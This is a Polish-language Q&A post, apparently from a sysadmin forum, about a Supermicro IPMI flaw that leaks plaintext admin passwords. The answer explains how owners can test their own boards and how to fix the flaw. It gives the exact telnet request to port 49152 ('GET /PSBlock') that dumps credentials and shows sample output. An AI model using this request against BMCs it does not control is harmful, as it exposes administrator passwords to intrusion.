Mam kilka serwerów Supermicro z uruchomionym IPMI i jak opisano w tym blogu ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) istnieje krytyczna luka w zabezpieczeniach Uzyskaj zwykłe hasła administratora z dowolnej zdalnej lokalizacji.
Jak sprawdzić, czy moja płyta główna serwera jest zagrożona?
Odpowiedzi:
Po prostu telnet na adres IPMI IPMI na porcie 49152 i wykonaj określone żądanie GET. Powinieneś dostać swoich użytkowników i hasła, jeśli jesteś zagrożony.
telnet server.example.com 49152
Po połączeniu zapytaj GET /PSBlocki obejrzyj wyniki, powinno to wyglądać mniej więcej tak:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Odpowiedź:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Aby rozwiązać ten problem, zaktualizuj oprogramowanie wewnętrzne IPMI do najnowszej wersji. Oprogramowanie układowe jest specyficzne dla twojego kontrolera IPMI, więc powinieneś dostać go na stronie internetowej Supermicro.
Następnie po aktualizacji oprogramowania zmień swoje hasła .